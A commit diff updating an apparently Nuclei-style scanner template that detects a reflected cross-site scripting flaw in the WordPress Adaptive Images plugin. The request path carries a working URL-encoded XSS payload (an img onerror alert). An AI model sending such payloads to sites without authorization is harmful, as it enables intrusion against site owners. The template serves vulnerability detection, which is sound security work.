Update wp-adaptive-xss.yaml

2022-03-01 02:30:16 +05:30 · 2022-03-01 02:30:16 +05:30 · dc6712dbf7
parent 8abb5bf2c0
commit dc6712dbf7
1 changed files with 11 additions and 8 deletions
--- a/vulnerabilities/wordpress/wp-adaptive-xss.yaml
+++ b/vulnerabilities/wordpress/wp-adaptive-xss.yaml
@ -5,20 +5,23 @@ info:
  author: dhiyaneshDK
  severity: medium
  description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
-  reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
-  tags: wordpress,xss,wp-plugin
+  reference:
+    - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
+    - https://plugins.trac.wordpress.org/changeset/2655683
+  tags: wordpress,xss,wp-plugin,wp

 requests:
-  - raw:
-      - |
-        GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true"

    matchers-condition: and
    matchers:
      - type: word
        words:
-          - '<img/src/onerror=alert("document.domain")>'
+          - '<img/src/onerror=alert(document.domain)>'
+          - '<td>Image</td>'
+        condition: and

      - type: word
        part: header
@ -27,4 +30,4 @@ requests:

      - type: status
        status:
-          - 200
+          - 200